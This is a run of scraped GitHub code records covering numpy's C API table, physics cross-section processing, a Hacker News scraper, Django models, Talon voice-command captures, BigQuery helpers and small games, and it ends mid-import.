(80,),\n 'PyArray_MoveInto': (81,),\n 'PyArray_CopyInto': (82,),\n 'PyArray_CopyAnyInto': (83,),\n 'PyArray_CopyObject': (84,),\n 'PyArray_NewCopy': (85,),\n 'PyArray_ToList': (86,),\n 'PyArray_ToString': (87,),\n 'PyArray_ToFile': (88,),\n 'PyArray_Dump': (89,),\n 'PyArray_Dumps': (90,),\n 'PyArray_ValidType': (91,),\n 'PyArray_UpdateFlags': (92,),\n 'PyArray_New': (93,),\n 'PyArray_NewFromDescr': (94, StealRef(2)),\n 'PyArray_DescrNew': (95,),\n 'PyArray_DescrNewFromType': (96,),\n 'PyArray_GetPriority': (97,),\n 'PyArray_IterNew': (98,),\n 'PyArray_MultiIterNew': (99,),\n 'PyArray_PyIntAsInt': (100,),\n 'PyArray_PyIntAsIntp': (101,),\n 'PyArray_Broadcast': (102,),\n 'PyArray_FillObjectArray': (103,),\n 'PyArray_FillWithScalar': (104,),\n 'PyArray_CheckStrides': (105,),\n 'PyArray_DescrNewByteorder': (106,),\n 'PyArray_IterAllButAxis': (107,),\n 'PyArray_CheckFromAny': (108, StealRef(2)),\n 'PyArray_FromArray': (109, StealRef(2)),\n 'PyArray_FromInterface': (110,),\n 'PyArray_FromStructInterface': (111,),\n 'PyArray_FromArrayAttr': (112,),\n 'PyArray_ScalarKind': (113,),\n 'PyArray_CanCoerceScalar': (114,),\n 'PyArray_NewFlagsObject': (115,),\n 'PyArray_CanCastScalar': (116,),\n 'PyArray_CompareUCS4': (117,),\n 'PyArray_RemoveSmallest': (118,),\n 'PyArray_ElementStrides': (119,),\n 'PyArray_Item_INCREF': (120,),\n 'PyArray_Item_XDECREF': (121,),\n 'PyArray_FieldNames': (122,),\n 'PyArray_Transpose': (123,),\n 'PyArray_TakeFrom': (124,),\n 'PyArray_PutTo': (125,),\n 'PyArray_PutMask': (126,),\n 'PyArray_Repeat': (127,),\n 'PyArray_Choose': (128,),\n 'PyArray_Sort': (129,),\n 'PyArray_ArgSort': (130,),\n 'PyArray_SearchSorted': (131,),\n 'PyArray_ArgMax': (132,),\n 'PyArray_ArgMin': (133,),\n 'PyArray_Reshape': (134,),\n 'PyArray_Newshape': (135,),\n 'PyArray_Squeeze': (136,),\n 'PyArray_View': (137, StealRef(2)),\n 'PyArray_SwapAxes': (138,),\n 'PyArray_Max': (139,),\n 'PyArray_Min': (140,),\n 'PyArray_Ptp': (141,),\n 'PyArray_Mean': (142,),\n 'PyArray_Trace': (143,),\n 'PyArray_Diagonal': (144,),\n 'PyArray_Clip': (145,),\n 'PyArray_Conjugate': (146,),\n 'PyArray_Nonzero': (147,),\n 'PyArray_Std': (148,),\n 'PyArray_Sum': (149,),\n 'PyArray_CumSum': (150,),\n 'PyArray_Prod': (151,),\n 'PyArray_CumProd': (152,),\n 'PyArray_All': (153,),\n 'PyArray_Any': (154,),\n 'PyArray_Compress': (155,),\n 'PyArray_Flatten': (156,),\n 'PyArray_Ravel': (157,),\n 'PyArray_MultiplyList': (158,),\n 'PyArray_MultiplyIntList': (159,),\n 'PyArray_GetPtr': (160,),\n 'PyArray_CompareLists': (161,),\n 'PyArray_AsCArray': (162, StealRef(5)),\n # Unused slot 163, was `PyArray_As1D`\n # Unused slot 164, was `PyArray_As2D`\n 'PyArray_Free': (165,),\n 'PyArray_Converter': (166,),\n 'PyArray_IntpFromSequence': (167,),\n 'PyArray_Concatenate': (168,),\n 'PyArray_InnerProduct': (169,),\n 'PyArray_MatrixProduct': (170,),\n # Unused slot 171, was `PyArray_CopyAndTranspose`\n 'PyArray_Correlate': (172,),\n 'PyArray_TypestrConvert': (173,),\n 'PyArray_DescrConverter': (174,),\n 'PyArray_DescrConverter2': (175,),\n 'PyArray_IntpConverter': (176,),\n 'PyArray_BufferConverter': (177,),\n 'PyArray_AxisConverter': (178,),\n 'PyArray_BoolConverter': (179,),\n 'PyArray_ByteorderConverter': (180,),\n 'PyArray_OrderConverter': (181,),\n 'PyArray_EquivTypes': (182,),\n 'PyArray_Zeros': (183, StealRef(3)),\n 'PyArray_Empty': (184, StealRef(3)),\n 'PyArray_Where': (185,),\n 'PyArray_Arange': (186,),\n 'PyArray_ArangeObj': (187,),\n 'PyArray_SortkindConverter': (188,),\n 'PyArray_LexSort': (189,),\n 'PyArray_Round': (190,),\n 'PyArray_EquivTypenums': (191,),\n 'PyArray_RegisterDataType': (192,),\n 'PyArray_RegisterCastFunc': (193,),\n 'PyArray_RegisterCanCast': (194,),\n 'PyArray_InitArrFuncs': (195,),\n 'PyArray_IntTupleFromIntp': (196,),\n 'PyArray_TypeNumFromName': (197,),\n 'PyArray_ClipmodeConverter': (198,),\n 'PyArray_OutputConverter': (199,),\n 'PyArray_BroadcastToShape': (200,),\n # Unused slot 201, was `_PyArray_SigintHandler`\n # Unused slot 202, was `_PyArray_GetSigintBuf`\n 'PyArray_DescrAlignConverter': (203,),\n 'PyArray_DescrAlignConverter2': (204,),\n 'PyArray_SearchsideConverter': (205,),\n 'PyArray_CheckAxis': (206,),\n 'PyArray_OverflowMultiplyList': (207,),\n 'PyArray_CompareString': (208,),\n 'PyArray_MultiIterFromObjects': (209,),\n 'PyArray_GetEndianness': (210,),\n 'PyArray_GetNDArrayCFeatureVersion': (211,),\n 'PyArray_Correlate2': (212,),\n 'PyArray_NeighborhoodIterNew': (213,),\n # End 1.5 API\n 'PyArray_SetDatetimeParseFunction': (219,),\n 'PyArray_DatetimeToDatetimeStruct': (220,),\n 'PyArray_TimedeltaToTimedeltaStruct': (221,),\n 'PyArray_DatetimeStructToDatetime': (222,),\n 'PyArray_TimedeltaStructToTimedelta': (223,),\n # NDIter API\n 'NpyIter_New': (224,),\n 'NpyIter_MultiNew': (225,),\n 'NpyIter_AdvancedNew': (226,),\n 'NpyIter_Copy': (227,),\n 'NpyIter_Deallocate': (228,),\n 'NpyIter_HasDelayedBufAlloc': (229,),\n 'NpyIter_HasExternalLoop': (230,),\n 'NpyIter_EnableExternalLoop': (231,),\n 'NpyIter_GetInnerStrideArray': (232,),\n 'NpyIter_GetInnerLoopSizePtr': (233,),\n 'NpyIter_Reset': (234,),\n 'NpyIter_ResetBasePointers': (235,),\n 'NpyIter_ResetToIterIndexRange': (236,),\n 'NpyIter_GetNDim': (237,),\n 'NpyIter_GetNOp': (238,),\n 'NpyIter_GetIterNext': (239,),\n 'NpyIter_GetIterSize': (240,),\n 'NpyIter_GetIterIndexRange': (241,),\n 'NpyIter_GetIterIndex': (242,),\n 'NpyIter_GotoIterIndex': (243,),\n 'NpyIter_HasMultiIndex': (244,),\n 'NpyIter_GetShape': (245,),\n 'NpyIter_GetGetMultiIndex': (246,),\n 'NpyIter_GotoMultiIndex': (247,),\n 'NpyIter_RemoveMultiIndex': (248,),\n 'NpyIter_HasIndex': (249,),\n 'NpyIter_IsBuffered': (250,),\n 'NpyIter_IsGrowInner': (251,),\n 'NpyIter_GetBufferSize': (252,),\n 'NpyIter_GetIndexPtr': (253,),\n 'NpyIter_GotoIndex': (254,),\n 'NpyIter_GetDataPtrArray': (255,),\n 'NpyIter_GetDescrArray': (256,),\n 'NpyIter_GetOperandArray': (257,),\n 'NpyIter_GetIterView': (258,),\n 'NpyIter_GetReadFlags': (259,),\n 'NpyIter_GetWriteFlags': (260,),\n 'NpyIter_DebugPrint': (261,),\n 'NpyIter_IterationNeedsAPI': (262,),\n 'NpyIter_GetInnerFixedStrideArray': (263,),\n 'NpyIter_RemoveAxis': (264,),\n 'NpyIter_GetAxisStrideArray': (265,),\n 'NpyIter_RequiresBuffering': (266,),\n 'NpyIter_GetInitialDataPtrArray': (267,),\n 'NpyIter_CreateCompatibleStrides': (268,),\n #\n 'PyArray_CastingConverter': (269,),\n 'PyArray_CountNonzero': (270,),\n 'PyArray_PromoteTypes': (271,),\n 'PyArray_MinScalarType': (272,),\n 'PyArray_ResultType': (273,),\n 'PyArray_CanCastArrayTo': (274,),\n 'PyArray_CanCastTypeTo': (275,),\n 'PyArray_EinsteinSum': (276,),\n 'PyArray_NewLikeArray': (277, StealRef(3)),\n # Unused slot 278, was `PyArray_GetArrayParamsFromObject`\n 'PyArray_ConvertClipmodeSequence': (279,),\n 'PyArray_MatrixProduct2': (280,),\n # End 1.6 API\n 'NpyIter_IsFirstVisit': (281,),\n 'PyArray_SetBaseObject': (282, StealRef(2)),\n 'PyArray_CreateSortedStridePerm': (283,),\n 'PyArray_RemoveAxesInPlace': (284,),\n 'PyArray_DebugPrint': (285,),\n 'PyArray_FailUnlessWriteable': (286,),\n 'PyArray_SetUpdateIfCopyBase': (287, StealRef(2)),\n 'PyDataMem_NEW': (288,),\n 'PyDataMem_FREE': (289,),\n 'PyDataMem_RENEW': (290,),\n # Unused slot 291, was `PyDataMem_SetEventHook`\n 'PyArray_MapIterSwapAxes': (293,),\n 'PyArray_MapIterArray': (294,),\n 'PyArray_MapIterNext': (295,),\n # End 1.7 API\n 'PyArray_Partition': (296,),\n 'PyArray_ArgPartition': (297,),\n 'PyArray_SelectkindConverter': (298,),\n 'PyDataMem_NEW_ZEROED': (299,),\n # End 1.8 API\n # End 1.9 API\n 'PyArray_CheckAnyScalarExact': (300,),\n # End 1.10 API\n 'PyArray_MapIterArrayCopyIfOverlap': (301,),\n # End 1.13 API\n 'PyArray_ResolveWritebackIfCopy': (302,),\n 'PyArray_SetWritebackIfCopyBase': (303,),\n # End 1.14 API\n 'PyDataMem_SetHandler': (304, MinVersion(\"1.22\")),\n 'PyDataMem_GetHandler': (305, MinVersion(\"1.22\")),\n # End 1.22 API\n 'NpyDatetime_ConvertDatetime64ToDatetimeStruct': (307, MinVersion(\"2.0\")),\n 'NpyDatetime_ConvertDatetimeStructToDatetime64': (308, MinVersion(\"2.0\")),\n 'NpyDatetime_ConvertPyDateTimeToDatetimeStruct': (309, MinVersion(\"2.0\")),\n 'NpyDatetime_GetDatetimeISO8601StrLen': (310, MinVersion(\"2.0\")),\n 'NpyDatetime_MakeISO8601Datetime': (311, MinVersion(\"2.0\")),\n 'NpyDatetime_ParseISO8601Datetime': (312, MinVersion(\"2.0\")),\n}\n\nufunc_types_api = {\n 'PyUFunc_Type': (0,)\n}\n\nufunc_funcs_api = {\n '__unused_indices__': [3, 25, 26, 29, 32],\n 'PyUFunc_FromFuncAndData': (1,),\n 'PyUFunc_RegisterLoopForType': (2,),\n # Unused slot 3, was `PyUFunc_GenericFunction`\n 'PyUFunc_f_f_As_d_d': (4,),\n 'PyUFunc_d_d': (5,),\n 'PyUFunc_f_f': (6,),\n 'PyUFunc_g_g': (7,),\n 'PyUFunc_F_F_As_D_D': (8,),\n 'PyUFunc_F_F': (9,),\n 'PyUFunc_D_D': (10,),\n 'PyUFunc_G_G': (11,),\n 'PyUFunc_O_O': (12,),\n 'PyUFunc_ff_f_As_dd_d': (13,),\n 'PyUFunc_ff_f': (14,),\n 'PyUFunc_dd_d': (15,),\n 'PyUFunc_gg_g': (16,),\n 'PyUFunc_FF_F_As_DD_D': (17,),\n 'PyUFunc_DD_D': (18,),\n 'PyUFunc_FF_F': (19,),\n 'PyUFunc_GG_G': (20,),\n 'PyUFunc_OO_O': (21,),\n 'PyUFunc_O_O_method': (22,),\n 'PyUFunc_OO_O_method': (23,),\n 'PyUFunc_On_Om': (24,),\n # Unused slot 25, was `PyUFunc_GetPyValues`\n # Unused slot 26, was `PyUFunc_checkfperr`\n 'PyUFunc_clearfperr': (27,),\n 'PyUFunc_getfperr': (28,),\n # Unused slot 29, was `PyUFunc_handlefperr`\n 'PyUFunc_ReplaceLoopBySignature': (30,),\n 'PyUFunc_FromFuncAndDataAndSignature': (31,),\n # Unused slot 32, was `PyUFunc_SetUsesArraysAsData`\n # End 1.5 API\n 'PyUFunc_e_e': (33,),\n 'PyUFunc_e_e_As_f_f': (34,),\n 'PyUFunc_e_e_As_d_d': (35,),\n 'PyUFunc_ee_e': (36,),\n 'PyUFunc_ee_e_As_ff_f': (37,),\n 'PyUFunc_ee_e_As_dd_d': (38,),\n # End 1.6 API\n 'PyUFunc_DefaultTypeResolver': (39,),\n 'PyUFunc_ValidateCasting': (40,),\n # End 1.7 API\n 'PyUFunc_RegisterLoopForDescr': (41,),\n # End 1.8 API\n 'PyUFunc_FromFuncAndDataAndSignatureAndIdentity': (42, MinVersion(\"1.16\")),\n # End 1.16 API\n}\n\n# List of all the dicts which define the C API\n# XXX: DO NOT CHANGE THE ORDER OF TUPLES BELOW !\nmultiarray_api = (\n multiarray_global_vars,\n multiarray_scalar_bool_values,\n multiarray_types_api,\n multiarray_funcs_api,\n)\n\nufunc_api = (\n ufunc_funcs_api,\n ufunc_types_api\n)\n\nfull_api = multiarray_api + ufunc_api\n","repo_name":"numpy/numpy","sub_path":"numpy/_core/code_generators/numpy_api.py","file_name":"numpy_api.py","file_ext":"py","file_size_in_byte":21385,"program_lang":"python","lang":"en","doc_type":"code","stars":25041,"dataset":"github-code","pt":"66"} +{"seq_id":"14054640976","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport importlib\n\nimport constants as const\nimport indexes\nimport grid\nfrom functions import MC_functions as mcf\n\nconst = importlib.reload(const)\ngrid = importlib.reload(grid)\nmcf = importlib.reload(mcf)\nindexes = importlib.reload(indexes)\n\n# G4MicroElecSiStructure::G4MicroElecSiStructure(): nLevels(6)\n# {\n# energyConstant.push_back(16.65*eV);\n# energyConstant.push_back(6.52*eV);\n# energyConstant.push_back(13.63*eV);\n# energyConstant.push_back(107.98*eV);\n# energyConstant.push_back(151.55*eV);\n# energyConstant.push_back(1828.5*eV);\n#\n# nLevels = energyConstant.size();\n# }\n\nE_bind = [16.65, 6.52, 13.63, 107.98, 151.55, 1828.5]\n\n# %%\nEE = grid.EE\n\ndiff_arr = np.loadtxt(\n '/Users/fedor/PycharmProjects/MC_simulation/notebooks/MuElec/microelec/sigmadiff_cumulated_inelastic_e_Si.dat')\ndiff_arr = diff_arr[np.where(diff_arr[:, 0] <= 30e+3)] # cut higher energies\n\ndiff_arr[np.where(diff_arr == 2)] = 1\n\nEE_unique = np.unique(diff_arr[:, 0])\ndiff_sigma_pre = np.zeros((6, len(EE_unique), len(grid.EE)))\n\n# %%\nhw_list = []\ndiff_arr_list = []\n\nfor n in range(6):\n for i, E in enumerate(EE_unique):\n inds = np.where(diff_arr[:, 0] == E)[0]\n hw = diff_arr[inds, 1]\n now_diff_arr = diff_arr[inds, n + 2]\n\n if np.max(now_diff_arr) == 0:\n continue\n\n hw_list.append(hw)\n diff_arr_list.append(now_diff_arr)\n\n now_arr = np.zeros(len(grid.EE))\n\n ind_beg = np.where(grid.EE > E_bind[n])[0][0] + 1\n now_arr[:ind_beg] = 0\n\n if len(np.where(grid.EE > hw[-1])[0]) > 0:\n ind_end = np.where(grid.EE > hw[-1])[0][0]\n now_arr[ind_end:] = 1\n now_arr[ind_beg:ind_end] = mcf.log_lin_interp(hw, now_diff_arr)(grid.EE[ind_beg:ind_end])\n\n else:\n now_arr[ind_beg:] = mcf.log_lin_interp(hw, now_diff_arr)(grid.EE[ind_beg:])\n\n diff_sigma_pre[n, i, :] = now_arr\n\n\nfor n in range(6):\n diff_sigma_pre[n, 0, :] = diff_sigma_pre[n, 1, :]\n\n# %%\ndiff_sigma_cumulated = np.zeros((6, len(grid.EE), len(grid.EE)))\n\nfor n in range(6):\n for j in range(len(grid.EE)):\n diff_sigma_cumulated[n, indexes.Si_E_cut_ind:, j] =\\\n mcf.log_lin_interp(EE_unique, diff_sigma_pre[n, :, j])(grid.EE[indexes.Si_E_cut_ind:])\n\n# %%\ndiff_sigma_cumulated[0, 278:294, :] = diff_sigma_cumulated[0, 294, :]\n\n# %%\nplt.figure(dpi=300)\nplt.imshow(np.log(diff_sigma_cumulated[5, :, :]))\nplt.show()\n\n# %%\n# inds_pre = list(range(3, 48, 7))\n#\n# inds = np.zeros(len(inds_pre), dtype=int)\n#\n# for i in range(len(inds)):\n# inds[i] = np.argmin(np.abs(grid.EE - EE_unique[inds_pre[i]]))\n#\n# print(EE_unique[inds_pre])\n# print(grid.EE[inds])\n#\n# plt.figure(dpi=300)\n#\n# for i in range(len(inds)):\n# plt.semilogx(hw_list[inds_pre[i]], diff_arr_list[inds_pre[i]], 'o')\n# plt.semilogx(grid.EE, diff_sigma_cumulated[0, inds[i], :])\n#\n# plt.show()\n\n# %% set extra elements to -2\nfor n in range(6):\n for i in range(len(grid.EE)):\n for j in range(len(grid.EE) - 1):\n\n if diff_sigma_cumulated[n, i, j + 1] == 0 and diff_sigma_cumulated[n, i, j] == 0:\n diff_sigma_cumulated[n, i, j] = 2\n\n if diff_sigma_cumulated[n, i, len(grid.EE) - j - 1] == 1 and\\\n diff_sigma_cumulated[n, i, len(grid.EE) - j - 1 - 1] == 1:\n diff_sigma_cumulated[n, i, len(grid.EE) - j - 1] = 2\n\n# %%\nnp.save('notebooks/MuElec/MuElec_inelastic_arrays/u_diff_cumulated_6.npy', diff_sigma_cumulated)\n\n\n\n","repo_name":"fedorsidorov/MC_simulation","sub_path":"notebooks/_outdated/MuElec/geant4_cumulated_arrays.py","file_name":"geant4_cumulated_arrays.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71896228049","text":"from bs4 import BeautifulSoup\nimport requests\n\ncontents = \"\"\nfor page in range(3):\n response = requests.get(f\"https://news.ycombinator.com/?p={page}\")\n contents += response.text\n\nsoup = BeautifulSoup(contents, \"html.parser\")\n\narticles = soup.select(\".titleline > a\")\nupvote = soup.select(\"td .subtext\")\n\narticle_text =[article.get_text() for article in articles]\narticle_link = [article.get(\"href\") for article in articles]\narticle_upvote = []\n\n\nfor vote in upvote:\n try:\n article_upvote.append(int(vote.select_one(\"span .score\").getText().split()[0]))\n except AttributeError:\n article_upvote.append(0)\n\nprint(article_text, f'\\n{len(article_text)}')\nprint(article_link, f'\\n{len(article_link)}')\nprint(article_upvote, f'\\n{len(article_upvote)}')\n\nindex_highest_score = article_upvote.index(max(article_upvote))\ntitle_most_voted = {article_text[index_highest_score]: [article_link[index_highest_score], article_upvote[index_highest_score]]}\nprint(title_most_voted)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"natalia-gcvs/100_days_of_code_python","sub_path":"day-45-web-scraping-with-beautiful-soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4132635230","text":"from django.db import models\nfrom django.utils import timezone\n\nfrom simple_history.models import HistoricalRecords\n\nfrom edc_constants.constants import UNKNOWN\n\nfrom ..choices import WHO_STAGE, WHO_DEFINING_ILLNESSES\n\nfrom .crf_model_mixin import CrfModelMixin, CrfInlineModelMixin\n\n\nclass WhoStaging(CrfModelMixin):\n\n report_datetime = models.DateTimeField(default=timezone.now, editable=False)\n\n who_stage = models.CharField(\n verbose_name='WHO stage',\n max_length=25,\n choices=WHO_STAGE,\n default=UNKNOWN)\n\n history = HistoricalRecords()\n\n class Meta(CrfModelMixin.Meta):\n app_label = 'ba_namotswe'\n verbose_name = 'WHO Staging'\n verbose_name_plural = 'WHO Staging'\n\n\nclass WhoDiagnosis(CrfInlineModelMixin):\n\n who_staging = models.ForeignKey(WhoStaging)\n\n dx = models.CharField(\n max_length=200,\n choices=WHO_DEFINING_ILLNESSES)\n\n dx_date = models.DateField(\n null=True,\n blank=True,\n help_text='Provide if known')\n\n history = HistoricalRecords()\n\n class Meta(CrfInlineModelMixin.Meta):\n app_label = 'ba_namotswe'\n verbose_name = 'WHO Diagnosis'\n verbose_name_plural = 'WHO Diagnosis'\n unique_together = (('who_staging', 'dx', 'dx_date'), )\n crf_inline_parent = 'who_staging'\n","repo_name":"botswana-harvard/ba-namotswe","sub_path":"ba_namotswe/models/who_staging.py","file_name":"who_staging.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19174956451","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom talon import Module\n\nfrom .target_types import ImplicitTarget, PrimitiveTarget, RangeTarget, RangeTargetType\n\nmod = Module()\n\nmod.list(\n \"cursorless_range_connective\",\n desc=\"A range joiner that indicates whether to include or exclude anchor and active\",\n)\n\n\n@dataclass\nclass RangeConnective:\n excludeAnchor: bool\n excludeActive: bool\n\n\n@dataclass\nclass RangeConnectiveWithType:\n connective: RangeConnective\n type: Optional[RangeTargetType]\n\n\n@mod.capture(rule=\"{user.cursorless_range_connective}\")\ndef cursorless_range_connective(m) -> RangeConnective:\n return RangeConnective(\n m.cursorless_range_connective in [\"rangeExclusive\", \"rangeExcludingStart\"],\n m.cursorless_range_connective in [\"rangeExclusive\", \"rangeExcludingEnd\"],\n )\n\n\n@mod.capture(\n rule=\"[] | \"\n)\ndef cursorless_range_connective_with_type(m) -> RangeConnectiveWithType:\n return RangeConnectiveWithType(\n getattr(m, \"cursorless_range_connective\", RangeConnective(False, False)),\n getattr(m, \"cursorless_range_type\", None),\n )\n\n\n@mod.capture(\n rule=(\n \"[] \"\n )\n)\ndef cursorless_range_target(m) -> RangeTarget:\n primitive_targets: list[PrimitiveTarget] = m.cursorless_primitive_target_list\n range_connective_with_type: RangeConnectiveWithType = (\n m.cursorless_range_connective_with_type\n )\n range_connective = range_connective_with_type.connective\n\n anchor = ImplicitTarget() if len(primitive_targets) == 1 else primitive_targets[0]\n\n return RangeTarget(\n anchor,\n primitive_targets[-1],\n range_connective.excludeAnchor,\n range_connective.excludeActive,\n range_connective_with_type.type,\n )\n","repo_name":"cursorless-dev/cursorless","sub_path":"cursorless-talon/src/targets/range_target.py","file_name":"range_target.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":879,"dataset":"github-code","pt":"66"} +{"seq_id":"73562741009","text":"def spider_plot(df):\n '''\n retrieved from https://www.python-graph-gallery.com/391-radar-chart-with-several-individuals\n '''\n import matplotlib.pyplot as plt\n import pandas as pd\n from math import pi\n \n # number of variable\n categories=list(df)\n N = len(categories)\n \n # We are going to plot the first line of the data frame.\n # But we need to repeat the first value to close the circular graph:\n values=df.loc[0].values.flatten().tolist()\n values += values[:1]\n values\n \n # What will be the angle of each axis in the plot? (we divide the plot / number of variable)\n angles = [n / float(N) * 2 * pi for n in range(N)]\n angles += angles[:1]\n \n # Initialise the spider plot\n fig, ax = plt.subplot(111, polar=True)\n \n # Draw one axe per variable + add labels\n plt.xticks(angles[:-1], categories, color='grey', size=8)\n \n # Draw ylabels\n ax.set_rlabel_position(0)\n plt.yticks([10,20,30], [\"10\",\"20\",\"30\"], color=\"grey\", size=7)\n plt.ylim(0,1)\n \n # Plot data\n ax.plot(angles, values, linewidth=1, linestyle='solid')\n \n # Fill area\n ax.fill(angles, values, 'b', alpha=0.1)\n \n # Show the graph\n return(fig, ax)\n","repo_name":"avichaychriqui/HeBERT","sub_path":"src/spider_plot.py","file_name":"spider_plot.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"66"} +{"seq_id":"33496774689","text":"from google.cloud import bigquery\n\n\nclass BigQueryWrapper():\n def __init__(self, project_name):\n self.client = bigquery.Client(project=project_name)\n\n def create_dataset(self, dataset_id):\n full_dataset_id = \"{}.{}\".format(self.client.project, dataset_id)\n dataset = bigquery.Dataset(full_dataset_id)\n dataset.location = \"us-east1\"\n dataset = self.client.create_dataset(dataset) # Make an API request.\n print(\"Created dataset {}.{}\".format(\n self.client.project, dataset.full_dataset_id))\n\n def create_table_from_storage(self, table_id, dataset, storage_uri):\n dataset_id = dataset\n table_id = table_id\n uri = storage_uri\n\n dataset_ref = self.client.dataset(dataset_id)\n\n job_config = bigquery.LoadJobConfig()\n job_config.autodetect = True\n job_config.source_format = bigquery.SourceFormat.CSV\n\n load_job = self.client.load_table_from_uri(\n uri, dataset_ref.table(table_id), job_config=job_config\n ) # API request\n print(\"Starting job {}\".format(load_job.job_id))\n\n load_job.result() # Waits for table load to complete.\n print(\"Job finished.\")\n\n destination_table = self.client.get_table(dataset_ref.table(table_id))\n print(\"Loaded {} rows.\".format(destination_table.num_rows))\n\n def query(self, query):\n # QUERY = (\n # 'SELECT * FROM {}.{}'.format(dataset_id, table_id))\n query_job = self.client.query(query) # API request\n rows = query_job.result() # Waits for query to finish\n\n for row in rows:\n print(row)\n\n\nif __name__ == \"__main__\":\n project_name = \"festive-magpie-279021\"\n dataset_id = \"teste_dataset\"\n table_id = \"comp_boss\"\n storage_uri = \"gs://teste_kaio/comp_boss.csv\"\n wrapper = BigQueryWrapper(project_name)\n wrapper.create_dataset(dataset_id)\n wrapper.create_table_from_storage(table_id, dataset_id, storage_uri)\n wrapper.query(\"SELECT * FROM {}.{}\".format(dataset_id, table_id))\n","repo_name":"Kaiohenriqueps/gcp_example","sub_path":"src/wrappers/bigquery_wrapper.py","file_name":"bigquery_wrapper.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72595156369","text":"from players import Player\nfrom robot import Robot\nfrom auxfunc import check_win, ALL_MOVES\n\n\nclass Game:\n def __init__(self, config):\n # idkw all_moves constant becomes inaccessible or don't renew after restart if we don't calc it here\n self.available_moves = {(x, y) for x in range(0, 3) for y in range(0, 3)}\n # dealing with a leadership by letting 1st player choose his mode\n self.p1 = Player(real=True, cross=config[0])\n # dealing with a status of the remaining player\n self.p2 = Player(real=config[1], cross=not config[0])\n # this flag is used to distinguish inbetween two winners\n self.first_winner = None\n self.r = Robot(self.available_moves)\n # we'll use this flag to end our game and count draw if the winner is still None\n self.end = False\n\n def step(self, first_turn, click_coord):\n robo_choice = False\n if first_turn:\n curr_player = self.p1\n else:\n curr_player = self.p2\n # filter two type of possible players - real and ai\n if curr_player.role:\n curr_player.move(click_coord)\n else:\n self.r.strategy(self.p2.moves, self.available_moves)\n robo_choice = self.r.result[0]\n curr_player.move(robo_choice)\n print(self.r.result, \"ROBOT!\")\n # update available moves set\n try:\n self.available_moves.remove(curr_player.moves[-1])\n # unknown rare bug after game end, possibly fault mouse click event handler when I click too fast\n # sometimes robot continues to work => overlaps used points, quite hard to catch that bug\n except KeyError:\n print('bug', self.available_moves, curr_player.moves[-1], self.end)\n # stop if no available_moves left\n if len(self.available_moves) == 0:\n self.end = True\n # check for winner\n if check_win(curr_player.moves):\n self.end = True\n if curr_player == self.p1:\n self.first_winner = True\n else:\n self.first_winner = False\n return robo_choice\n","repo_name":"Axik0/ttt","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33214741780","text":"class Comportameto:\n def __init__(self, jogador, posicao, probabilidade_50) -> None:\n from app.bo.bo_jogador import JogadorBo\n from app.bo.bo_tabuleiro import Tabuleiro\n\n self.jogador_bo = JogadorBo\n self.jogador = jogador\n self.posicao = posicao\n self.propriedade = Tabuleiro.tabuleiro\n self.probabilidade_50 = probabilidade_50\n\n def impulsivo(self):\n # O jogador impulsivo compra qualquer propriedade sobre a qual ele parar.\n msg = self.jogador_bo.comprar(self.jogador, self.posicao)\n return msg\n\n def exigente(self):\n # O jogador exigente compra qualquer propriedade, desde que o valor do aluguel dela seja maior do que 50.\n if self.propriedade[self.posicao].aluguel > 50:\n msg = self.jogador_bo.comprar(self.jogador, self.posicao)\n return msg\n else:\n return \"Falha\"\n\n def cauteloso(self):\n # O jogador cauteloso compra qualquer propriedade desde que ele tenha uma reserva de 80 saldo sobrando\n # depois de realizada a compra.\n if (self.jogador.conta - self.propriedade[self.posicao].venda) >= 80:\n msg = self.jogador_bo.comprar(self.jogador, self.posicao)\n return msg\n else:\n \"Falha\"\n\n def aleatorio(self):\n # O jogador aleatório compra a propriedade que ele parar em cima com probabilidade de 50%.\n msg = (\n self.jogador_bo.comprar(self.jogador, self.posicao)\n if self.probabilidade_50 == 2\n else \"Falha\"\n )\n return msg\n","repo_name":"gesilva1991/brasilprev","sub_path":"app/comportamento.py","file_name":"comportamento.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34557310018","text":"# A class that draws the spirograph.\r\n\r\nimport turtle\r\n\r\nclass Spiro():\r\n \"\"\"A class that will draw the spirographs.\"\"\"\r\n def __init__(self, xc, yc, col, R, r, l):\r\n \"\"\"Initializing the class turle attributes\"\"\"\r\n \r\n # Create the turle object.\r\n self.t = turtle.Turtle()\r\n # Set the cursor shape.\r\n self.t.shape('turtle')\r\n # Set the step in degrees.\r\n self.step = 5\r\n # set the drawing complete flag.\r\n self.drawingComplete = False\r\n \r\n # Set the parameters.\r\n self.setparams(xc, yc, col, R, r, l)\r\n \r\n # Initialize the drawing.\r\n self.restart()\r\n \r\n # call timer\r\n turtle.ontimer(self.update, self.deltaT)","repo_name":"john-walter-munene/spirographs","sub_path":"spiral_constructor.py","file_name":"spiral_constructor.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1936312026","text":"import os\nimport sys\nimport time\nimport glob\nimport math\nimport pickle\nimport pymbar\nimport natsort\nimport warnings\nimport argparse \nimport alchemlyb\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nfrom matplotlib import cm\nfrom rich.progress import track\nfrom pymbar.timeseries import statistical_inefficiency\nfrom alchemlyb.parsing.gmx import extract_u_nk, 